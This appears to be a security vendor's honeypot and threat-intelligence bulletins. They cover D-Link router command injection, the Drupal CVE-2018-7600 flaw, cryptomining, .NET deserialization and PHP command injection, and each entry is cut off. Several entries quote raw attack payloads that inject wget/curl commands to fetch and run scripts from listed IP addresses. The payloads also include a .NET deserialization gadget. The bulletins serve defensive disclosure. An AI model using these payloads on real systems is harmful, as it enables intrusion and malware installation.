D-Link Router Vulnerability

Date of Detection: 2018.5.24
Attack Pattern: URI: /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
Malware: The malware is hosted at this IP address: 185.62.190.191.
Target System: D-Link DSL-2750B
Analysis: Attackers first exploit vulnerable systems and then control them with malware. Because the affected routers fail to validate user input, remote attackers can control them without credentials. Due[…]

Widespread Drupal Arbitrary Code Execution

Date of Detection: 2018.3.29
Attack Pattern: URI: /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
Request Body: form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec& mail%5B%23type%5D=markup&mail%5B%23markup%5D=wget%20http%3A%2F%2F51.254.219.134%2Fdrupal.php
Target System: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code.
Analysis: This issue is not a zero-day vulnerability; it has been assigned CVE-2018-7600. However, attackers are scanning and[…]

Honeypot Extraction – Digital Currency Mining

Date of Detection: 2018.1.30
Description: Cryptocurrency mining is becoming more and more popular. Attackers are widely exploiting victims’ systems to mine digital currencies and make a profit. According to a news report on February 21st, 2018, even Tesla's cloud resources were hacked to run cryptocurrency-mining malware. As CloudCoffer’s honeypots keep detecting this type of exploit and[…]

Honeypot Extraction – Windows .NET Framework

Date of Detection: 2017.12.11
Source IP Addresses: 173.212.217.181, 149.255.35.91
Attack Raw Pattern: DNNPersonalization=<profile><item key=\"key\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"><ExpandedWrapperOfObjectStateFormatterObjectDataProvider> <ProjectedProperty0> <ObjectInstance p3:type=\"ObjectStateFormatter\" xmlns:p3=\"http://www.w3.org/2001/XMLSchema-instance\" /> <MethodName>Deserialize</MethodName> <MethodParameters> <anyType xmlns:q1=\"http://www.w3.org/2001/XMLSchema\" p5:type=\"q1:string\" xmlns:p5=\"http://www.w3.org/2001/XMLSchema-instance\">[base64 payload omitted]</anyType> </MethodParameters> </ProjectedProperty0> </ExpandedWrapperOfObjectStateFormatterObjectDataProvider></item></profile>;
Target System: Windows with .NET Framework
Malicious File Path from the[…]

Honeypot Extraction – Command Injection

Date of Detection: 2017.11.20
Source IP Addresses: 27.255.77.103
Attack Raw Pattern: After URL decoding, the pattern is as follows.
<? system("cd /tmp ; wget http://175.126.167.52/apache.txt ; curl -O http://175.126.167.52/apache.txt ; fetch http://175.126.167.52/apache.txt ; chmod +x apache.txt ; perl apache.txt ; rm -rf apache.txt ; history -c "); ?>
Malicious File Path from the[…]